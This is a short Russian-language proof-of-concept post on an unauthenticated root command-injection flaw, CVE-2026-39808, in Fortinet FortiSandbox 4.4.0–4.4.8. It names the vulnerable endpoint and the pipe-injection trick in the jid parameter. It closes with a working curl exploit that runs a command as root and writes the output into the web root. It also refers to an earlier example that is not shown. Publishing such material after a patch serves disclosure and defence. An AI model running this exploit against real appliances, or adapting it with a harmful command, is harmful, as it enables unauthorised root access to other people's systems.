
PoC для неаутентифицированного RCE в FortiSandbox через CVE-2026-39808
В ноябре 2025 года в FortiSandbox компании Fortinet была обнаружена критическая уязвимость, которая позволяла неаутентифицированному злоумышленнику выполнять команды в базовой операционной системе с правами root. Уязвимость была исправлена и наконец раскрыта в апреле 2026 года.
Эта уязвимость затрагивает версии FortiSandbox с 4.4.0 по 4.4.8.
Прочитайте полный бюллетень здесь.
Уязвимость затрагивает конечную точку /fortisandbox/job-detail/tracer-behavior. Команды ОС могут быть внедрены с помощью символа канала (|) в GET-параметре jid.
В приведённом выше примере вывод был перенаправлен в файл в корневом каталоге веб-сервера, чтобы его можно было получить позже.
Простой команды curl достаточно для достижения RCE с правами root без предварительной аутентификации:
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"